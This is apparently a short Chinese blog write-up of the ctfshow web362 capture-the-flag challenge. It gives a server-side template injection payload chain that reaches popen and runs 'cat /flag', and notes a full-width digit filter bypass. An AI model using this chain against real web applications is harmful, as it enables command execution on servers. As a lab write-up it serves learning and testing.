当前位置:网站首页>ctfshow-web362(SSTI)
ctfshow-web362(SSTI)
2022-04-23 18:29:00 【m0_62094846】
?name={
{"".__class__.__bases__[0].__subclasses__()}} 一直到这一步都是正常的
从12开始就没用了
数字出现了问题,看wp用全角数字代替正常数字绕过
?name={
{"".__class__.__bases__[0].__subclasses__()[132]}}
然后应该可以用正常方法做了
?name={
{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
版权声明
本文为[m0_62094846]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_62094846/article/details/124361669
边栏推荐
- Connection mode of QT signal and slot connect() and the return value of emit
- WIN1 remote "this may be due to credssp encryption Oracle correction" solution
- Daily CISSP certification common mistakes (April 18, 2022)
- STM32 learning record 0008 - GPIO things 1
- 机器学习实战 -朴素贝叶斯
- logstash 7. There is a time problem in X. the difference between @ timestamp and local time is 8 hours
- Install the yapiupload plug-in in idea and upload the API interface to the Yapi document
- Ionic 从创建到打包指令集顺序
- Log4j2 cross thread print traceid
- The difference between deep copy and shallow copy
猜你喜欢
Nodejs installation
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability
Promote QT default control to custom control
MySQL auto start settings start with systemctl start mysqld
【ACM】376. 摆动序列
From introduction to mastery of MATLAB (2)
Use of regular expressions in QT
CANopen STM32 transplantation
Setting up keil environment of GD single chip microcomputer
【ACM】455. 分发饼干(1. 大饼干优先喂给大胃口;2. 遍历两个数组可以只用一个for循环(用下标索引--来遍历另一个数组))
随机推荐
Domestic GD chip can filter
Error reported when running tensorboard: valueerror: duplicate plugins for name projector, solution
Docker installation MySQL
14个py小游戏源代码分享第二弹
SQL database syntax learning notes
Excel intercept text
Qt读写XML文件(含源码+注释)
Keil RVMDK compiled data type
Installation du docker redis
CISSP certified daily knowledge points (April 18, 2022)
How to restore MySQL database after win10 system is reinstalled (mysql-8.0.26-winx64. Zip)
串口调试工具cutecom和minicom
powerdesigner各种字体设置;preview字体设置;sql字体设置
Robocode tutorial 8 - advanced robot
Test questions of daily safety network (February 2024)
WiFi ap6212 driver transplantation and debugging analysis technical notes
Custom prompt box MessageBox in QT
【ACM】509. Fibonacci number (DP Trilogy)
Ionic instruction set order from creation to packaging
JD freefuck Jingdong HaoMao control panel background Command Execution Vulnerability